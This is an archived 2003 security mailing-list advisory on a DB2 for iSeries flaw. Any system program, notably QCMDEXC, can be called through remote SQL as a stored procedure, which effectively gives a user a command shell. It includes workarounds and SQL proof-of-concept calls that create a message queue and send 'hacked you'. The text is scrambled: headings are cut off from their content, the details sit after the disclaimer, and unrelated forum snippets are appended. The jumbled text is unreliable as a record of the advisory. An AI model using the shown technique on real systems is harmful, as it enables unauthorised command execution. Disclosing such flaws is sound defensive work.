[NEWS] DB2 on iSeries Stored Procedures Vulnerability
From: support@securiteam.com
Date: 01/05/03
- Previous message: support@securiteam.com: "[EXPL] Ptrace() Injector (Malaria)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: 6 Jan 2003 00:14:58 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
Beyond Security would like to welcome Tiscali World Online
to our service provider team.
For more info on their service offering IP-Secure,
please visit http://www.worldonline.co.za/services/work_ip.asp
- - - - - - - - -
DB2 on iSeries Stored Procedures Vulnerability
------------------------------------------------------------------------
SUMMARY
DB2 UDB for iSeries supports stored procedures calls. It also allows the
DETAILS
Vulnerable systems:
What is the impact of this vulnerability?
B. This vulnerability lets a user execute REXX scripts.
C. A user can create new programs and new REXX scripts.
CL command and REXX scripts can be used on their own to gain further
Workarounds and/or fixes for this vulnerability:
Recreation:
Of course, a program can be written using the language of your choice to
1. First, let's make sure that QCMDEXC was not declared as a stored
2. Create a message queue called hack on the server
3. Send message "hacked you" to message queue hack
ANY iSeries program can be properly supplied with parameters and executed
ADDITIONAL INFORMATION
The information has been provided by <mailto:shalom@venera.com> Shalom
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
====================
DISCLAIMER:
CREATE PROCEDURE statement to reference existing program objects.
Unfortunately, it does nor require explicit definition of existing program
objects as stored procedures, allowing the execution of ANY program via
remote SQL calls (see
<http://publib.boulder.ibm.com/iseries/v5r2/ic2924/index.htm?info/sqlp/rbafymst202.htm> http://publib.boulder.ibm.com/iseries/v5r2/ic2924/index.htm?info/sqlp/rbafymst202.htm).
* iSeries versions 3.2 - 5.2 (Verified for 4.4 - 5.1)
A. This vulnerability lets an otherwise limited user execute iSeries
commands.
The iSeries contains a system program, QCMDEXC, that effectively provides
a remote shell for command execution, similar to the SQL server
xp_cmdshell procedure. With proper parameters, this program can be called
to execute local commands.
The iSeries contains a system program, QREXX, that provides an API for
executing REXX scripts on the server. With proper parameters, this program
can be called to execute existing REXX scripts on the server.
CL programs sources are kept in Source files (typically QCLSRC). REXX
scripts are kept in Source files (Typically QREXSRC). Source files are
accessible by SQL to modify, create and delete. An attacker can issue a
stream of INSERT statements to a CL source file, and then compile it using
the QCMDEXC shell. An attacker can issue a stream of INSERT statements to
a REXX source file, and execute them using either QREXX, or the STRREXPRC
command by QCMDEXC. Of course, source files also contain RPG, COBOL, and C
programs, so an attacker can actually upload any program source to the
server, compile it and run it.
access to the server and database, or as a tool to download additional
programs or scripts via FTP and other tools.
1.Revoke Public authority to all *PGM objects in the system, unless you
intend them to be called from SQL.
2.Revoke Public authority to QCMDEXC and QREXX, if possible.
3.A security package that monitors SQL exit programs may work, but only
for IBM ODBC, and will not work for other vendors nor for DRDA access.
The SQL commands can be run against an AS400 ODBC, JDBC, DRDA or OLE DB
connection. They can be executed using the iSeries CA express tool. An
account on the iSeries is required.
demonstrate the same..
procedure
select * from sysprocs where upper(routine_name) = 'QCMDEXC'
Call qcmdexc('crtmsgq hack' , 0000000012.00000)
Call qcmdexc('sndmsg ''hacked you'' hack' , 0000000024.00000)
in this way.
Carmel.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
Relevant Pages
... Author: Jürgen Schmidt, heise Security ... Windows Explorer does not
update zone information ... When a user tries to execute a file downloaded from the ...
files from archives with a ZoneID greater than or equal ... (Full-Disclosure)
... Flaws security feature of SP2 ... Windows Explorer does not update zone
information ... When a user tries to execute a file downloaded from the ... files
from archives with a ZoneID greater than or equal ... (Full-Disclosure)
... assembly actually has the permission in question. ... Try and find the sorce
of the security permission error, ... setting was done on both versions 1.1 and 2.0 .NET
framework. ... When I execute the application I received and error message. ...
(microsoft.public.dotnet.security)
... "Mac vs. Windows Security: Mac Benefits Explained" ... The only time
it is checked is when these priv levels are attempting to execute at higher privs. ...
This outlines several BUFFER OVERFLOW scenarios that involved AFP, which means that the system
was REMOTELY VULNERABLE. ... (comp.sys.mac.advocacy)
... I have a rather strange linker problem. ... To initialize this factory
with the different products, ... LASS_EXECUTE_BEFORE_MAIN(...) never does execute its argument.
... (just placed in different source files), ... (comp.lang.cpp)
